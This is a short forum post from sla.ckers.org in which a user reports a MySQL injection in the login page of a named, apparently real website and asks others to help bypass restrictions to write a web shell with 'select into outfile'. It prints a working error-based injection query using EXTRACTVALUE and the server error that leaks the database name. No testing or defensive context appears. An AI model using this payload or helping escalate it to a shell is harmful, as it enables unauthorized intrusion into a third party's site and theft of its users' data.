Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
who can bypass this
Posted by: guantouqiang
Date: April 08, 2014 10:41AM

http://ysts.39yst.com/2012/ login have mysql injection

but only get some data,who can bypass this and select into outfile getshell

MySQL Query : SELECT * FROM `pre_ucenter_members` WHERE `username`='1111' AND EXTRACTVALUE(4905,CONCAT(0x5c,0x7161757671,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x717a666571)) AND 'YiBx'='YiBx'
MySQL Error : XPATH syntax error: '\qauvq39yst_com_bbs_v2qzfeq'
MySQL Errno : 1105
Message : MySQL Query Error

Options: ReplyQuote


Sorry, only registered users may post in this forum.